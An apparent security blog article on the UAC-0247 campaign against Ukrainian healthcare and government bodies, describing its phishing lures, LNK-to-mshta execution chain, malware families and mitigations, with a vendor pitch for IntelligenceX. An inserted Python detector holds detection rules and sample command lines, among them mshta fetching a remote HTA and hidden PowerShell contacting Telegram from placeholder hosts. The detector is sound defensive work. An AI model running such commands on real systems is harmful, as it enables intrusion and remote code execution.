Abhay Negi

UAC-0247 Cyberattack Campaign Signals Escalation in Targeted Attacks on Healthcare and Government Infrastructure

The cybersecurity landscape continues to shift toward more targeted, stealth-driven operations, and the UAC-0247 campaign is a clear example of this evolution. Recently disclosed by CERT-UA, this campaign specifically targeted Ukrainian government institutions and healthcare organizations, including clinics and emergency response facilities, with a sophisticated malware framework engineered for persistence, surveillance, and large-scale data exfiltration.

Observed between March and April 2026, the campaign reflects a calculated and multi-layered approach that combines social engineering, exploitation of trusted systems, and advanced malware deployment techniques. While attribution remains unclear, the operational discipline and technical complexity strongly suggest involvement from a well-funded and organized threat group.

Phishing Strategy Tailored for Maximum Impact

The initial access vector used in this campaign revolves around phishing emails that appear to be legitimate humanitarian aid proposals. This theme is strategically chosen to exploit trust, urgency, and emotional response, particularly in environments where such communications are common.

Recipients who engage with these emails are directed to malicious links. These links either lead to compromised legitimate websites—where attackers exploit vulnerabilities such as cross-site scripting—or to convincing fake websites generated using artificial intelligence tools.

This dual approach significantly increases success rates. Victims are more likely to trust a legitimate domain, while AI-generated phishing pages allow attackers to scale operations without sacrificing realism. The ultimate objective is to trick users into downloading a malicious file disguised as legitimate content.

Execution Chain: A Layered Approach to System Compromise

Once the victim downloads the file, the attack progresses through a carefully structured execution chain. The file is typically a Windows shortcut (LNK), which serves as the trigger for the infection process.

When opened, the LNK file leverages the built-in Windows utility “mshta.exe” to execute a remote HTML Application (HTA). This technique is widely used by attackers because it relies on legitimate system tools, making detection more difficult.

The HTA file presents a decoy interface to the victim, creating the illusion of a normal process while executing malicious actions in the background. It downloads additional payloads and injects shellcode into trusted processes such as RuntimeBroker.exe, a standard Windows component whose presence in a process list does not by itself look suspicious.

This process injection technique is particularly effective because it allows the malware to operate within legitimate system processes, bypassing many traditional security controls.

In more advanced scenarios, the attackers deploy a two-stage loader system. The second stage is built using a custom executable format that supports dynamic imports and structured execution. The payload is encrypted and compressed, making it significantly harder to analyze or detect.

Persistence and Command-and-Control Mechanisms

Maintaining access is a critical component of the campaign. To achieve this, attackers deploy a reverse shell known as RAVENSHELL, which establishes a persistent connection to a command-and-control server.

This allows attackers to execute commands remotely, using standard tools such as cmd.exe, which further reduces the likelihood of detection.

In addition to RAVENSHELL, the attackers deploy a malware family known as AGINGFLY. Developed in C#, this malware provides extensive control over compromised systems, enabling attackers to execute commands, capture keystrokes, download files, and deploy additional payloads.

Another key component is SILENTLOOP, a PowerShell-based script designed to enhance resilience. It retrieves command-and-control server addresses from Telegram channels and includes fallback mechanisms to ensure continuous operation even if primary infrastructure is disrupted.
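The three behaviours described above (mshta.exe launched with a remote HTA, a cmd.exe or PowerShell shell spawned from an injected host such as RuntimeBroker.exe, and PowerShell reaching out to Telegram for C2 addresses) each leave a process-creation footprint. The detector below is an added example, not code from the article or from CERT-UA; it runs three simple rules over constructed Sysmon-style process-creation events, and the URLs and command lines in the sample data are made up for illustration.

```python
"""Toy detector for the UAC-0247 execution chain over constructed
Sysmon-style process-creation events (Event ID 1 fields, simplified)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the newly created process
    parent_image: str   # full path of the parent process
    cmdline: str        # command line of the new process


def _base(path: str) -> str:
    """Lower-cased file name without the directory part."""
    return path.rsplit("\\", 1)[-1].lower()


# One rule per step of the chain described in the article.
RULES = [
    ("mshta_remote_hta",            # LNK -> mshta.exe fetching a remote HTA
     lambda e: _base(e.image) == "mshta.exe"
               and re.search(r"https?://", e.cmdline, re.I) is not None),
    ("shell_from_runtimebroker",    # RAVENSHELL-style shell from an injected host
     lambda e: _base(e.parent_image) == "runtimebroker.exe"
               and _base(e.image) in {"cmd.exe", "powershell.exe"}),
    ("powershell_telegram_c2",      # SILENTLOOP-style C2 lookup via Telegram
     lambda e: _base(e.image) == "powershell.exe"
               and re.search(r"t\.me/|telegram\.org", e.cmdline, re.I) is not None),
]


def detect(events):
    """Return (rule_name, process_name) for every event that matches a rule."""
    return [(name, _base(e.image)) for e in events for name, pred in RULES if pred(e)]


# Constructed sample log; hostnames are placeholders, not real indicators.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r'mshta.exe "http://example.invalid/aid-proposal.hta"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\RuntimeBroker.exe",
              r"cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe",
              r'powershell.exe -w hidden -c "iwr https://t.me/s/placeholder_channel"'),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r"mshta.exe C:\Tools\local-admin-tool.hta"),   # local HTA: no alert
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The last sample event shows the deliberate gap in the first rule: a locally stored HTA is not flagged, so this rule complements rather than replaces the execution restrictions discussed later in the article.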

Data Exfiltration and Post-Exploitation Activities

The primary objective of the UAC-0247 campaign is data theft. Attackers focus on extracting sensitive information from Chromium-based browsers, including stored credentials, cookies, and session data.

They also deploy specialized tools to extract data from WhatsApp Web, allowing access to private communications.

Beyond data exfiltration, the attackers conduct reconnaissance and lateral movement within compromised networks. Tools used in the campaign enable network scanning, tunneling, and expansion into additional systems.

In some cases, cryptocurrency mining tools have also been observed, suggesting that financial gain may be a secondary objective.

Why Traditional Security Measures Are Not Enough

The techniques used in this campaign make it particularly challenging to detect. By leveraging legitimate system tools, encrypting payloads, and using multi-stage execution chains, attackers can operate without triggering traditional security alerts.

This is where platforms like IntelligenceX become essential. IntelligenceX provides organizations with visibility into exposed assets, malicious infrastructure, and emerging threat patterns.

By using IntelligenceX, security teams can identify suspicious domains, monitor attacker infrastructure, and correlate threat intelligence across multiple sources.

Mitigation and Defense Strategies

Organizations should restrict execution of high-risk file types such as LNK, HTA, and JavaScript files. Limiting the use of tools like mshta.exe and PowerShell can also reduce the attack surface.

User awareness training is equally important, as phishing remains one of the most effective attack vectors.

Conclusion

The UAC-0247 campaign highlights the growing sophistication of cyber threats targeting critical infrastructure. Organizations must adopt proactive, intelligence-driven security strategies to defend against these evolving risks.
